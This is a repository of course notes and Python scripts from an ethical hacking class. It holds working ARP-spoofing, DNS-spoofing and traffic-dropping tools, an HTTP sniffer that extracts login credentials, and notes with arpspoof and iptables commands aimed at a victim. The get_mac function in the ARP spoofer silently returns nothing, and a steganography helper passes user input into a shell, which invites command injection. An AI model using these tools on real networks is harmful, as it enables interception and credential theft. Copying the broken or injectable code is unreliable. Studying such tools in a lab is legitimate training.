├── 10-12.md ├── 13-15.md ├── 4-6.md ├── 7-9.md ├── PDF ├── arp_spoofer.pdf ├── dns_spoofer.pdf ├── mac_changer.pdf ├── network_scanner.pdf └── packet_sniffer.pdf ├── README.md ├── arp_spoofer.py ├── dns_spoof.py ├── mac.py ├── mac1.py ├── mac2.py ├── net_cut.py ├── network_scanner.py ├── network_scanner1.py ├── network_scanner2.py ├── packet_sniffer.py └── st3g3xtract.py /10-12.md: -------------------------------------------------------------------------------- 1 | 2 | # Part 5 ARP Spoofer 3 | 4 | Python - Loops https://www.tutorialspoint.com/python/python_loops.htm 5 | 6 | Python - Exceptions Handling https://www.tutorialspoint.com/python/python_exceptions.htm 7 | 8 | 9 | 10 | Files: 11 | 12 | ##### Version 3 = [network_scanner2.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/network_scanner2.py) 13 | 14 | 15 | # Part 6 Packet Sniffer 16 | 17 | Files: 18 | 19 | 20 | # [Part 4, 5, 6](link) 21 | -------------------------------------------------------------------------------- /13-15.md: -------------------------------------------------------------------------------- 1 | 2 | # Part 5 ARP Spoofer 3 | 4 | Python - Loops https://www.tutorialspoint.com/python/python_loops.htm 5 | 6 | Python - Exceptions Handling https://www.tutorialspoint.com/python/python_exceptions.htm 7 | 8 | 9 | 10 | Files: 11 | 12 | ##### Version 3 = [network_scanner2.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/network_scanner2.py) 13 | 14 | 15 | # Part 6 Packet Sniffer 16 | 17 | Files: 18 | 19 | 20 | # [Part 4, 5, 6](link) 21 | -------------------------------------------------------------------------------- /4-6.md: -------------------------------------------------------------------------------- 1 | # Part 4 Network Scanner 2 | 3 | Presentation https://mp4-c.udemycdn.com/2018-06-27_14-03-09-933d490aa5a2d8ad41d650738e3a9862/original.pdf?e=1586873794&h=eeaab82b9a7111651f3512a030fab83c 4 
| 5 | Windows VM = Passw0rd https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 6 | 7 | Scapy Documentation https://scapy.readthedocs.io/en/latest/ 8 | 9 | Scapy ARP Ping https://scapy.readthedocs.io/en/latest/usage.html#arp-ping 10 | 11 | Send and receive packets (sr) https://scapy.readthedocs.io/en/latest/usage.html#send-and-receive-packets-sr 12 | 13 | Python - Lists https://www.tutorialspoint.com/python/python_lists.htm 14 | 15 | Python escape characters https://docs.python.org/2.0/ref/strings.html 16 | 17 | Python - Dictionary https://www.tutorialspoint.com/python/python_dictionary.htm 18 | 19 | Argparse - https://docs.python.org/3.3/library/argparse.html 20 | 21 | - netdiscover -r 10.0.2.1/24 22 | 23 | - route -n 24 | 25 | Kali 2018 - perfect https://drive.google.com/file/d/1NlFB48CThvyqaif1IRu9YQu5h6yloWeY/view?usp=sharing 26 | 27 | Files: 28 | 29 | ##### Version 1 = [network_scanner.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/network_scanner.py) 30 | 31 | ##### Version 2 = [network_scanner1.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/network_scanner1.py) 32 | 33 | ##### Version 3 = [network_scanner2.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/network_scanner2.py) 34 | 35 | # Part 5 ARP Spoofer 36 | 37 | Python - Loops https://www.tutorialspoint.com/python/python_loops.htm 38 | 39 | Python - Exceptions Handling https://www.tutorialspoint.com/python/python_exceptions.htm 40 | 41 | - arp -a 42 | 43 | - arpspoof -i eth0 -t 10.0.2.7 10.0.2.1 against victim 44 | 45 | - arpspoof -i eth0 -t 10.0.2.1 10.0.2.7 against router 46 | 47 | - echo 1 > /proc/sys/net/ipv4/ip_forward # enable IP forwarding 48 | 49 | - route -n # router ip 50 | 51 | Files: 52 | 53 | ##### Version 1 = 
[arp_spoofer.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/arp_spoofer.py) 54 | 55 | 56 | # Part 6 Packet Sniffer 57 | 58 | Build your own tools - Sniff Function - https://scapy.readthedocs.io/en/latest/extending.html 59 | 60 | Scapy HTTP https://github.com/invernizzi/scapy-http 61 | 62 | Berkeley Packet Filter (BPF) syntax https://biot.com/capstats/bpf.html 63 | 64 | Logins for testing: 65 | 66 | - http://testphp.vulnweb.com/login.php 67 | 68 | - http://www.stealmylogin.com/demo.html 69 | 70 | Files: 71 | 72 | ##### Version 1 = [packet_sniffer.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/packet_sniffer.py) 73 | 74 | # [Part 7, 8, 9](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/7-9.md) 75 | -------------------------------------------------------------------------------- /7-9.md: -------------------------------------------------------------------------------- 1 | 2 | # Part 7 DNS Spoofer 3 | 4 | echo 1 > /proc/sys/net/ipv4/ip_forward # enable IP forwarding 5 | 6 | iptables -I FORWARD -j NFQUEUE --queue-num 0 7 | 8 | ##### capture packets 9 | 10 | pip install netfilterqueue 11 | 12 | sudo apt-get install python-netfilterqueue 13 | 14 | ##### local 15 | 16 | 17 | iptables -I OUTPUT -j NFQUEUE --queue-num 0 18 | 19 | iptables -I INPUT -j NFQUEUE --queue-num 0 20 | ##### remove rules (iptables --flush deletes every rule in the filter table, not only the NFQUEUE rules added above) 21 | 22 | iptables --flush 23 | 24 | service apache2 start 25 | 26 | /var/www/html 27 | 28 | ping -c 1 www.bing.com 29 | 30 | Files: 31 | 32 | ##### Version 1 = [net_cut.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/net_cut.py) 33 | 34 | ##### Version 1 = [dns_spoof.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/dns_spoof.py) 35 | 36 | # Part 8 File Interceptor 37 | 38 | Files: 39 | 40 | 41 | # Part 9 Writing a 
Code Injector 42 | 43 | # [Part 10, 11, 12](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/10-12.md) 44 | -------------------------------------------------------------------------------- /PDF/arp_spoofer.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/6103f063433060f67f25dcc31ca1be237bcbd2db/PDF/arp_spoofer.pdf -------------------------------------------------------------------------------- /PDF/dns_spoofer.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/6103f063433060f67f25dcc31ca1be237bcbd2db/PDF/dns_spoofer.pdf -------------------------------------------------------------------------------- /PDF/mac_changer.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/6103f063433060f67f25dcc31ca1be237bcbd2db/PDF/mac_changer.pdf -------------------------------------------------------------------------------- /PDF/network_scanner.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/6103f063433060f67f25dcc31ca1be237bcbd2db/PDF/network_scanner.pdf -------------------------------------------------------------------------------- /PDF/packet_sniffer.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/6103f063433060f67f25dcc31ca1be237bcbd2db/PDF/packet_sniffer.pdf -------------------------------------------------------------------------------- 
/README.md: -------------------------------------------------------------------------------- 1 | # Snippets and notes from course: Learn Python and Ethical Hacking 2 | 3 | # Part 2 Mac Changer 4 | 5 | Snippets and notes from https://www.udemy.com/course/learn-python-and-ethical-hacking-from-scratch/ 6 | 7 | Kali for this course https://zsecurity.org/download-custom-kali/ 8 | 9 | List of linux commands https://www.mediacollege.com/linux/command/linux-command.html 10 | 11 | Mac Changer Presentation https://mp4-a.udemycdn.com/2018-06-27_14-02-56-bb5df79fb3b6893871cc2e2116b50c37/original.pdf?4brs5qRNTVIShYJrfmyFmz8LpbXT2ZUfnEIPD9vBSdmlJYpTO9xHpvyhwxQeGE5JWvet8hug6vuGa1zlC7MPhJXbETBvIs8giNyLPWwXV6blIwEK3BasayjPZUjAemENbB3yDlvF_NUpY22RdT8HjFO_WqLrroskCZuz5nLAIf4 12 | 13 | Subprocess https://docs.python.org/2/library/subprocess.html 14 | 15 | Variables https://www.tutorialspoint.com/python/python_variable_types.htm 16 | 17 | Strings https://www.tutorialspoint.com/python/python_strings.htm 18 | 19 | Functions https://docs.python.org/2/library/functions.html#raw_input 20 | 21 | Opt parse https://docs.python.org/2/library/optparse.html 22 | 23 | Decision Making https://www.tutorialspoint.com/python/python_decision_making.htm 24 | 25 | Files: 26 | 27 | ##### Version 1 = [mac.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/mac.py) 28 | 29 | ##### Version 2 = [mac1.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/mac1.py) 30 | 31 | ##### Variation 1 = [st3g3xtract.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/st3g3xtract.py) 32 | 33 | # Part 3 Mac Changer Algorithm Design 34 | 35 | Check_call() https://docs.python.org/2/library/subprocess.html 36 | 37 | Regular expressions https://www.tutorialspoint.com/python/python_reg_expressions.htm 38 | 39 | Regular expressions https://pythex.org/ 40 | 41 | Re module 
https://docs.python.org/2/library/re.html 42 | 43 | Files: 44 | 45 | ##### Version 3 = [mac2.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/mac2.py) 46 | 47 | # [Part 4, 5, 6](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/4-6.md) 48 | -------------------------------------------------------------------------------- /arp_spoofer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import scapy.all as scapy 4 | import time 5 | 6 | 7 | def get_mac(ip): 8 | arp_request = scapy.ARP(pdst=ip) 9 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 10 | arp_request_broadcast = broadcast / arp_request 11 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] 12 | 13 | 14 | def spoof(target_ip, spoof_ip): 15 | target_mac = get_mac(target_ip) 16 | packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip) 17 | scapy.send(packet, verbose=False) # verbose - dont flood on screen 18 | # scapy.ls(scapy.ARP) - to see what packet consist of 19 | # psrc - router IP 20 | # op Short enum field - ARP response 21 | # print(packet.show()) 22 | # print(packet.summary()) 23 | 24 | 25 | def restore(destination_ip, source_ip): 26 | destination_mac = get_mac(destination_ip) 27 | source_mac = get_mac(source_ip) 28 | packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac) 29 | # target_mac="08:00:27:ee:32:d7" 30 | scapy.send(packet, count=4, verbose=False) 31 | 32 | 33 | target_ip = "192.168.1.79" 34 | gateway_ip = "192.168.1.254" 35 | 36 | try: 37 | sent_packets_count = 0 38 | while True: 39 | spoof(target_ip, gateway_ip) 40 | # we are router 41 | spoof(gateway_ip, target_ip) 42 | # we are client 43 | sent_packets_count = sent_packets_count + 2 44 | print("\r[+] Packets sent: " + str(sent_packets_count), end="") 45 | # dynamic printing 46 
| time.sleep(2) 47 | except KeyboardInterrupt: 48 | print("\n[+] Detected CTRL + C . . . . . Quitting.") 49 | restore(target_ip, gateway_ip) 50 | restore(gateway_ip, target_ip) 51 | -------------------------------------------------------------------------------- /dns_spoof.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import netfilterqueue 3 | import scapy.all as scapy 4 | 5 | 6 | def process_packet(packet): 7 | scapy_packet = scapy.IP(packet.get_payload()) 8 | if scapy_packet.haslayer(scapy.DNSRR): 9 | qname = scapy_packet[scapy.DNSQR].qname 10 | if "www.bing.com" in qname: 11 | print ("[+] Spoofing target") 12 | answer = scapy.DNSRR(rrname=qname, rdata="192.168.1.77") 13 | # kali 14 | scapy_packet[scapy.DNS].an = answer 15 | scapy_packet[scapy.DNS].ancount = 1 16 | 17 | del scapy_packet[scapy.IP].len 18 | del scapy_packet[scapy.IP].chksum 19 | del scapy_packet[scapy.UDP].chksum 20 | del scapy_packet[scapy.UDP].len 21 | 22 | packet.set_payload(str(scapy_packet)) 23 | 24 | packet.accept() 25 | 26 | 27 | queue = netfilterqueue.NetfilterQueue() 28 | queue.bind(0, process_packet) 29 | queue.run() 30 | -------------------------------------------------------------------------------- /mac.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import subprocess 4 | # OS commands 5 | import optparse 6 | # user input commands 7 | 8 | 9 | parser = optparse.OptionParser() 10 | parser.add_option("-i", "--interface", dest="interface", help="Interface to change it's MAC address") 11 | parser.add_option("-m", "--mac", dest="new_mac", help="New MAC address") 12 | (options, arguments) = parser.parse_args() 13 | # capture arguments and options from user input, "-i" - option, "interface" - argument 14 | # options then arguments, contains user input options.new_mac 15 | 16 | # ctrl+d duplicate string 17 | # ctrl+/ comment string 18 | 19 | # variables: 20 
| # interface = "eth0" 21 | # new_mac = "00:00:00:00:00:00" 22 | 23 | # variables for input - options 24 | 25 | interface = options.interface 26 | new_mac = options.new_mac 27 | 28 | # user input: 29 | # interface = input("interface > ") 30 | # new_mac = input("new MAC > ") 31 | # for python2.7 raw_input("") 32 | 33 | print("[+] Changing MAC address for " + interface + " to " + new_mac) 34 | 35 | # subprocess.call("ifconfig " + interface + " down", shell=True) 36 | # subprocess.call("ifconfig " + interface + " hw ether " + new_mac, shell=True) 37 | # subprocess.call("ifconfig " + interface + " up", shell=True) 38 | # the shell=True form above puts unchecked user input into one shell string; 39 | # input such as ;ls; (ifconfig; ls; down) makes the shell run extra commands (command injection) 40 | 41 | subprocess.call(["ifconfig", interface, "down"]) 42 | subprocess.call(["ifconfig", interface, "hw", "ether", new_mac]) 43 | subprocess.call(["ifconfig", interface, "up"]) 44 | 45 | # list arguments run ifconfig directly without a shell, so ; in user input stays a plain argument and is not executed; the values are still not validated as an interface name or MAC address 46 | 47 | # default: 48 | # experimental: de:ad:be:ef:ca:fe 49 | -------------------------------------------------------------------------------- /mac1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import subprocess 4 | import optparse 5 | 6 | 7 | def get_arguments(): 8 | parser = optparse.OptionParser() 9 | parser.add_option("-i", "--interface", dest="interface", help="Interface to change it's MAC address") 10 | parser.add_option("-m", "--mac", dest="new_mac", help="New MAC address") 11 | return parser.parse_args() 12 | # returns the (options, arguments) pair to the caller 13 | 14 | 15 | def change_mac(interface, new_mac): 16 | print("[+] Changing MAC address for " + interface + " to " + new_mac) 17 | subprocess.call(["ifconfig", interface, "down"]) 18 | subprocess.call(["ifconfig", interface, "hw", "ether", new_mac]) 19 | subprocess.call(["ifconfig", interface, "up"]) 20 | 21 | 22 | (options, arguments) = get_arguments() 23 | change_mac(options.interface, 
options.new_mac) 24 | # function inputs 25 | -------------------------------------------------------------------------------- /mac2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #check output 3 | import subprocess 4 | import optparse 5 | import re 6 | 7 | 8 | def get_arguments(): 9 | parser = optparse.OptionParser() 10 | parser.add_option("-i", "--interface", dest="interface", help="Interface to change it's MAC address") 11 | parser.add_option("-m", "--mac", dest="new_mac", help="New MAC address") 12 | return parser.parse_args() 13 | # get this arguments outside 14 | 15 | 16 | def change_mac(interface, new_mac): 17 | print("[+] Changing MAC address for " + interface + " to " + new_mac) 18 | subprocess.call(["ifconfig", interface, "down"]) 19 | subprocess.call(["ifconfig", interface, "hw", "ether", new_mac]) 20 | subprocess.call(["ifconfig", interface, "up"]) 21 | 22 | 23 | def get_current_mac(interface): 24 | ifconfig_result = subprocess.check_output(["ifconfig", interface]) 25 | mac_address_search_result = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", ifconfig_result) 26 | 27 | if mac_address_search_result: 28 | return mac_address_search_result.group(0) 29 | else: 30 | print( 31 | "[-] Could not read Mac address.") # to execute programm without errors, lo interface doesn't have MAC adress 32 | 33 | 34 | (options, arguments) = get_arguments() 35 | current_mac = get_current_mac(options.interface) 36 | print("Current MAC = " + str(current_mac)) 37 | change_mac(options.interface, options.new_mac) 38 | # function inputs 39 | current_mac = get_current_mac(options.interface) 40 | if current_mac == options.new_mac: 41 | print("[+] MAC address was successfully changed to " + current_mac) 42 | else: 43 | print("[-] MAC address did not get changed.") 44 | -------------------------------------------------------------------------------- /net_cut.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import netfilterqueue 3 | 4 | 5 | def process_packet(packet): 6 | print(packet) 7 | packet.drop() 8 | 9 | 10 | queue = netfilterqueue.NetfilterQueue() 11 | queue.bind(0, process_packet) 12 | queue.run() 13 | -------------------------------------------------------------------------------- /network_scanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import scapy.all as scapy 4 | 5 | 6 | def scan(ip): 7 | # list clients of the network and MAC addresses 8 | # scapy.arping(ip) can take IP ranges 9 | arp_request = scapy.ARP(pdst=ip) 10 | # arp_request.show() 11 | # print(arp_request.summary()) 12 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 13 | # set destination MAC to broadcast 14 | arp_request_broadcast = broadcast / arp_request 15 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] 16 | # send packets combined of parts and receive response, answered_list and unanswered_list 17 | print("__________________________________________\nIP\t\t\tMAC Address\n------------------------------------------") 18 | for element in answered_list: 19 | print(element[1].psrc + "\t\t" + element[1].hwsrc) 20 | # parse the values 21 | 22 | 23 | scan("192.168.1.254/24") 24 | # 192.168.1.77/24 my IP 25 | -------------------------------------------------------------------------------- /network_scanner1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import scapy.all as scapy 4 | 5 | 6 | def scan(ip): 7 | arp_request = scapy.ARP(pdst=ip) 8 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 9 | arp_request_broadcast = broadcast / arp_request 10 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] 11 | clients_list = [] 12 | for element in answered_list: 13 | client_dict = {"ip": 
element[1].psrc, "mac": element[1].hwsrc} 14 | clients_list.append(client_dict) 15 | return clients_list 16 | 17 | 18 | def print_result(results_list): 19 | print("__________________________________________\nIP\t\t\tMAC Address\n------------------------------------------") 20 | for client in results_list: 21 | print(client["ip"] + "\t\t" + client["mac"]) 22 | 23 | 24 | scan_result = scan("192.168.1.254/24") 25 | print_result(scan_result) 26 | -------------------------------------------------------------------------------- /network_scanner2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import scapy.all as scapy 4 | import argparse 5 | 6 | 7 | def get_arguments(): 8 | parser = argparse.ArgumentParser() 9 | parser.add_argument("-t", "--target", dest="target", help="Target IP / IP range.") 10 | options = parser.parse_args() 11 | return options 12 | 13 | 14 | def scan(ip): 15 | arp_request = scapy.ARP(pdst=ip) 16 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 17 | arp_request_broadcast = broadcast / arp_request 18 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] 19 | clients_list = [] 20 | for element in answered_list: 21 | client_dict = {"ip": element[1].psrc, "mac": element[1].hwsrc} 22 | clients_list.append(client_dict) 23 | return clients_list 24 | 25 | 26 | def print_result(results_list): 27 | print("__________________________________________\nIP\t\t\tMAC Address\n------------------------------------------") 28 | for client in results_list: 29 | print(client["ip"] + "\t\t" + client["mac"]) 30 | 31 | 32 | options = get_arguments() 33 | scan_result = scan(options.target) 34 | print_result(scan_result) 35 | -------------------------------------------------------------------------------- /packet_sniffer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import scapy.all as scapy 4 | from 
scapy.layers import http 5 | 6 | 7 | def sniff(interface): 8 | scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet) 9 | # prn = callback run for each captured packet; store=False keeps no packets in memory; an optional filter= takes BPF syntax, e.g. "port 21", "tcp", "udp" 10 | 11 | 12 | def get_url(packet): 13 | return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path 14 | 15 | 16 | def get_login_info(packet): 17 | if packet.haslayer(scapy.Raw): 18 | load = packet[scapy.Raw].load 19 | keywords = ["username", "user", "login", "password", "pass"] 20 | for keyword in keywords: 21 | if keyword in load: 22 | return load # the whole raw payload is returned on the first keyword match; with no match the function falls through and returns None 23 | 24 | 25 | def process_sniffed_packet(packet): 26 | if packet.haslayer(http.HTTPRequest): 27 | url = get_url(packet) 28 | print("[+] HTTP Request >> " + url) 29 | login_info = get_login_info(packet) 30 | if login_info: 31 | print("\n\n[+] Possible username/password >> " + login_info + "\n\n") 32 | 33 | 34 | sniff("eth0") 35 | 36 | -------------------------------------------------------------------------------- /st3g3xtract.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env/python 2 | 3 | import os 4 | import optparse 5 | import subprocess 6 | import argparse 7 | 8 | 9 | # import pyfiglet 10 | 11 | def strings_check(filename, flag2grep): 12 | print("\033[1;32;10m [+] Strings checking " + filename + " grep: " + flag2grep + "\n") 13 | print("\033[0;37;10m ... \n") 14 | # ascii_banner = pyfiglet.figlet_format("I hate it") 15 | # print(ascii_banner) 16 | os.system("strings " + filename + " | grep " + flag2grep) # NOTE(review): filename and flag2grep are concatenated into one shell command line, so shell metacharacters in either option are interpreted by the shell (command injection); foremost_check and binwalk_check in this file pass an argument list to subprocess.call instead, which involves no shell 17 | print("\033[1;32;10m [+] Strings done \n") 18 | 19 | 20 | def foremost_check(filename): 21 | print("\033[1;32;10m [+] Trying to extract everything with foremost from " + filename + "\n") 22 | print("\033[0;37;10m ... 
\n") 23 | subprocess.call(["foremost", "-T", filename]) 24 | print("\033[1;32;10m [+] Foremost done \n [+] Check output folder, please \n") 25 | 26 | 27 | def binwalk_check(filename): 28 | print("\033[1;32;10m [+] Trying to extract everything with binwalk from " + filename + "\n") 29 | print("\033[0;37;10m ... \n") 30 | subprocess.call(["binwalk", "-e", filename]) 31 | print("\033[1;32;10m [+] Binwalk done \n [+] Check output folder, please \n") 32 | 33 | 34 | def get_arguments(): 35 | parser = optparse.OptionParser() 36 | parser.add_option("-f", "--filename", dest="filename", help="Name of the file to check") 37 | parser.add_option("-F", "--flag2grep", dest="flag2grep", help="Word or command to use with grep") 38 | parser.add_option("-b", "--binwalk", dest="binwalk", action="store_true", help="Use binwalk") 39 | parser.add_option("-o", "--foremost", dest="foremost", action="store_true", help="Use foremost") 40 | parser.add_option("-s", "--strings", dest="strings", action="store_true", help="Use strings with grep") 41 | return parser.parse_args() 42 | 43 | 44 | (options, arguments) = get_arguments() 45 | if options.binwalk: 46 | binwalk_check(options.filename) 47 | if options.foremost: 48 | foremost_check(options.filename) 49 | if options.strings: 50 | strings_check(options.filename, options.flag2grep) 51 | else: 52 | binwalk_check(options.filename) 53 | foremost_check(options.filename) 54 | strings_check(options.filename, options.flag2grep) 55 | --------------------------------------------------------------------------------